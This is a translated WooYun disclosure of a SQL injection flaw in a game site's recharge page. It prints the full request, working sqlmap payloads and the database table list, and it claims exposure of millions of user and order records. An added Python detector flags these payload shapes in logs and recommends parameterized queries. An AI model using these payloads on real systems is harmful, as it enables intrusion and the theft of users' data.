
Vulnerability Summary

Defect ID: wooyun-2015-0154213

Title: The main site of the 紫金岛 (Zijindao) game has a SQL injection vulnerability exploitable via UNION (2 million user records and tens of millions of order records)

Vendor: 91zjd.com

Author: 路人甲

Submitted: 2015-11-19 09:44

Fix deadline: 2015-11-25 09:00

Disclosed: 2015-11-25 09:00

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: the vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability Details

Disclosure status:

2015-11-19: details sent to the vendor, awaiting the vendor's handling
2015-11-25: the vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

Detailed description:

POST /recharge/alipay_recharge.asp HTTP/1.1
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: ASPSESSIONIDCSTTDCDB=KLFDBCBAJGFLMKFJLJJMCKNL; ASP.NET_SessionId=514hzo55fo1wrz55ipgybo55; Hm_lvt_d5924889d984deffd476e1699e74ce59=1447669732,1447669829,1447669830,1447669852; Hm_lpvt_d5924889d984deffd476e1699e74ce59=1447669852; CNZZDATA4818108=cnzz_eid%3D899435885-1447669577-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1447669577; bdshare_firstime=1447669578206; HMACCOUNT=23FE2290393AAD15; BAIDUID=B65CAF626516BDEBC3DF19CD8CC25F5B:FG=1
Host: www.91zjd.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
immediately_rech=%c1%a2%bc%b4%b3%e4%d6%b5&account=11111&againaccount=4111111111111111&DropDownList1=1&txtyzm=1

[Screenshot: 22.jpg]

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: account (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: immediately_rech=%c1%a2%bc%b4%b3%e4%d6%b5&account=11111' AND 7184=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(122)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (7184=7184) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(98)+CHAR(98)+CHAR(113))) AND 'yPCg'='yPCg&againaccount=4111111111111111&DropDownList1=1&txtyzm=1
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: immediately_rech=%c1%a2%bc%b4%b3%e4%d6%b5&account=11111';WAITFOR DELAY '0:0:5'--&againaccount=4111111111111111&DropDownList1=1&txtyzm=1
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: immediately_rech=%c1%a2%bc%b4%b3%e4%d6%b5&account=-8992' UNION ALL SELECT CHAR(113)+CHAR(112)+CHAR(122)+CHAR(98)+CHAR(113)+CHAR(73)+CHAR(68)+CHAR(112)+CHAR(107)+CHAR(88)+CHAR(98)+CHAR(117)+CHAR(119)+CHAR(81)+CHAR(108)+CHAR(113)+CHAR(118)+CHAR(98)+CHAR(98)+CHAR(113)-- &againaccount=4111111111111111&DropDownList1=1&txtyzm=1
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2008
Database: QPGameUserDB
[85 tables]
+------------------------------+
| 168logo_ForTG |
| 168logo_ForTeam |
| 168logo_ForTeam |
| AccountsInfo0821 |
| AccountsInfo1121 |
| AccountsInfo_20131010 |
| AccountsInfo_20131010 |
| AccountsInfo_emailbak |
| AccountsInfo_emailbak |
| AccountsInfo_regtj |
| AccountsInfo_temp1 |
| AccountsInfo_temp1 |
| AccountsInfo_xt |
| AccountsInfobak |
| ConfineAddress |
| ConfineContent |
| ConfineMachine |
| CustomTable |
| D99_CMD |
| D99_REG |
| D99_Tmp |
| DIY_TEMPCOMMAND_TABLE |
| DailyLogonPrize |
| GameIdentifier |
| GameUserBang_New_tyb |
| GameUserBang_TYBLogo |
| GameUserBang_TYB_WEEKLY_view |
| GameUserBang_TYB_WEEKLY_view |
| GameUserBang_abest_view |
| GameUserBang_abest_view |
| GoldEggsLog20110 |
| GoldEggsLog20110 |
| GoldEggsLog20110 |
| GoldEggsLog2012 |
| IndividualDatumFirend |
| IndividualDatumbak |
| IndividualDatumbak |
| LuckUser |
| PK_GameDownloadCount |
| PK_RegSourceIp |
| PK_SOURCE_IP_POOL |
| PK_WebPage_Click_Count |
| QPGameUserDB |
| QQcdkey |
| Rechargeable_Card_TEST |
| Rechargeable_Card_TEST |
| Reg_Arrt |
| S3_Tmp |
| ShortUrlLink |
| SystemStatusInfo |
| SystemStreamInfo |
| UserAddScoreLogo |
| UserMemberOrder |
| UserWincountlogo |
| VW_Charge_List |
| View_AccountsInfo_regtjNew |
| View_AccountsInfo_regtjNew |
| View_CZK_TG |
| View_Rechargeable_Card_tg |
| View_TYB_USERBANG |
| View_UserALLLogo_bySpid |
| View_UserALLLogo_bySpid |
| View_UserFristLogo |
| View_UserLogoNew |
| View_UserLogoNew |
| View_Userinfo_ME |
| View_VWUserFristLogo |
| View_t1 |
| View_t310 |
| View_t320 |
| View_t500 |
| Yjt_accounts |
| accountsinfo20110101 |
| comd_list |
| dxUserbak |
| dxuserall |
| dxuserall |
| dxuserlist |
| iphonetemp1 |
| iphonetemp1 |
| iphonetemp2 |
| sqlmapoutput |
| tempUsername |
| tempcity |
| we |
+------------------------------+
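The sqlmap output above names three injection techniques that worked against the `account` parameter: error-based (an `AND n=CONVERT(INT, ...)` clause), stacked queries (`;WAITFOR DELAY`), and a UNION query, two of them using `CHAR(n)+CHAR(n)+...` to build marker strings. The following is an added detection example, not code from the report or from the vendor: it form-decodes a POST body and flags every parameter value that carries one of those shapes, so a reviewer can spot this class of probe in request logs or a WAF feed. The sample bodies are constructed from the request and payloads shown above; the signature names and the `scan_body`/`scan_requests` functions are this example's own.

```python
"""Flag the SQL injection shapes sqlmap reported for the `account` parameter
(error-based CONVERT, stacked WAITFOR DELAY, UNION SELECT) in URL-encoded
POST bodies. Added detection example, not the report's or vendor's code;
the sample bodies at the bottom are constructed from the report's payloads."""
from __future__ import annotations

import re
from urllib.parse import unquote_plus

# One signature per technique named in the sqlmap output, plus the
# CHAR(n)+CHAR(n)+... marker-string construction used by two of them.
# A raw `+` in the body decodes to a space while `%2B` decodes to `+`,
# so the CHAR chain pattern accepts either between calls.
SIGNATURES: dict[str, re.Pattern[str]] = {
    "error-based": re.compile(r"\bAND\b\s+\d+\s*=\s*CONVERT\s*\(\s*INT\b", re.I),
    "stacked queries": re.compile(r";\s*WAITFOR\s+DELAY\s+'", re.I),
    "UNION query": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    "char-obfuscation": re.compile(r"(?:CHAR\(\d+\)[\s+]*){3,}", re.I),
}


def decode_form(body: str) -> list[tuple[str, str]]:
    """Split an application/x-www-form-urlencoded body into decoded (name, value) pairs.

    Done by hand rather than with parse_qs so a `;` inside a stacked-query
    payload is never treated as a field separator on older Python versions.
    """
    pairs: list[tuple[str, str]] = []
    for field in body.split("&"):
        name, _, raw = field.partition("=")
        pairs.append((unquote_plus(name), unquote_plus(raw)))
    return pairs


def scan_body(body: str) -> list[tuple[str, str]]:
    """Return (parameter, technique) pairs for every decoded value that matches.

    Decoding first means percent-escapes cannot hide a payload from the
    patterns; a body with no matches returns [].
    """
    hits: list[tuple[str, str]] = []
    for name, value in decode_form(body):
        for technique, pattern in SIGNATURES.items():
            if pattern.search(value):
                hits.append((name, technique))
    return hits


def scan_requests(requests: dict[str, str]) -> dict[str, list[tuple[str, str]]]:
    """Scan several labelled bodies and keep only those with at least one hit."""
    return {label: hits for label, body in requests.items() if (hits := scan_body(body))}


# Constructed sample bodies: the report's benign request, its three sqlmap
# payloads, and an innocent apostrophe to show a lone quote does not fire.
SAMPLE_BODIES = {
    "benign": "immediately_rech=%c1%a2%bc%b4%b3%e4%d6%b5&account=11111"
              "&againaccount=4111111111111111&DropDownList1=1&txtyzm=1",
    "apostrophe": "account=O'Brien&againaccount=4111111111111111",
    "error-based": "immediately_rech=%c1%a2%bc%b4%b3%e4%d6%b5&account=11111' AND 7184=CONVERT(INT,"
                   "(SELECT CHAR(113)+CHAR(112)+CHAR(122)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN "
                   "(7184=7184) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(98)+"
                   "CHAR(98)+CHAR(113))) AND 'yPCg'='yPCg&againaccount=4111111111111111"
                   "&DropDownList1=1&txtyzm=1",
    "stacked": "immediately_rech=%c1%a2%bc%b4%b3%e4%d6%b5&account=11111';WAITFOR DELAY '0:0:5'--"
               "&againaccount=4111111111111111&DropDownList1=1&txtyzm=1",
    "union": "immediately_rech=%c1%a2%bc%b4%b3%e4%d6%b5&account=-8992' UNION ALL SELECT "
             "CHAR(113)+CHAR(112)+CHAR(122)+CHAR(98)+CHAR(113)+CHAR(73)+CHAR(68)+CHAR(112)+"
             "CHAR(107)+CHAR(88)+CHAR(98)+CHAR(117)+CHAR(119)+CHAR(81)+CHAR(108)+CHAR(113)+"
             "CHAR(118)+CHAR(98)+CHAR(98)+CHAR(113)-- &againaccount=4111111111111111"
             "&DropDownList1=1&txtyzm=1",
}

if __name__ == "__main__":
    for label, hits in scan_requests(SAMPLE_BODIES).items():
        print(f"{label}: {hits}")
```

These patterns match the specific sqlmap shapes the report shows, which makes them useful for triaging logs or tuning a WAF rule after the fact; they do not catch hand-crafted variants, and the only change that actually removes the injection is to stop concatenating `account` into the query in the ASP handler and bind it as a parameter instead.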

2.22 million user records:

[Screenshot: 23.png]

Tens of millions of order records:

[Screenshot: 24.png]

Proof of vulnerability:

Fix recommendation:

Copyright notice: when reposting, credit the source as 路人甲@乌云


Vulnerability Response

Vendor response:

Severity: no impact, vendor ignored

Ignored at: 2015-11-25 09:00

Vendor reply:

Vulnerability Rank: 15 (WooYun rating)

Latest status:

None yet